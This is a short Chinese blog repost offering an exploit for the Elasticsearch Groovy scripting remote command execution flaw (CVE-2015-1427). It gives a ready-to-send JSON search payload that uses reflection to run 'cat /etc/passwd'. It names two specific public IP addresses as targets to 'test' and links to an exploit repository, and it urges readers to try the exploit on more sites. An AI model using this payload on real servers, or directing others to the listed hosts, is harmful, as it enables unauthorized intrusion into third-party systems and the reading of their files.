Elasticsearch Groovy任意命令执行漏洞EXP

感谢:@lupin 的分析(Elasticsearch Groovy 脚本动态执行漏洞分析和poc(CVE-2015-1427)) 
本exp不一定正确,测试的站太少了,大家去测试测试。 
测试url:http://190.196.67.252:9200/_search?pretty 
http://191.234.18.14:9200///_search?pretty 
{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}
is.jpg

 

 

EXP:https://github.com/Svti/ElasticSearchEXP/

 

转载自乌云zone

转载于:https://www.cnblogs.com/Le30bjectNs11/p/4317559.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值